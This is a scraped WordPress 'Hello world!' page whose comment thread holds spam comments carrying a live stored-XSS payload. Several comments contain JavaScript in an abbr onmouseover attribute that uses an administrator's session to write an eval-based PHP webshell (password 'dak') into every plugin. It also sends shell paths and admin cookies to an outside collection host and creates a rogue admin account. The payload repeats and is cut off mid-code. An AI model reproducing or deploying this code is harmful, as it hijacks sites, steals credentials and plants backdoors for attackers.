Hello world!By admin Posted August 6, 2013 In Uncategorized2013-08-062013-08-06https://equatorian.com/wp-content/uploads/2016/10/ei-logo-leftr-1.jpgEquatorianhttps://equatorian.com/wp-content/uploads/2016/10/ei-logo-leftr-1.jpg200px200px 09Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!adminRecent PostsHello world!Showing 9 commentsMr WordPressAugust 6, 2013Hi, this is a comment. To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.murphyNovember 27, 2015hellonice dlphes:-) williamsonDecember 4, 2015hellonice ojridg:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ v%3schmidtDecember 6, 2015hinice slvdiu:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target%3wallaceDecember 10, 2015hinice zcxgif:-) knightDecember 12, 2015hellonice ntllpu:-) kelleyDecember 13, 2015hinice ubpbci:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','em%brewerDecember 14, 2015hinice ydfyiu:-) matthewsDecember 26, 2015hinice proimx:-)
Hi, this is a comment.
To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.
hellonice dlphes:-)
hellonice ojridg:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ v%3
hinice slvdiu:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target%3
hinice zcxgif:-)
hellonice ntllpu:-)
hinice ubpbci:-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','em%
hinice ydfyiu:-)
hinice proimx:-)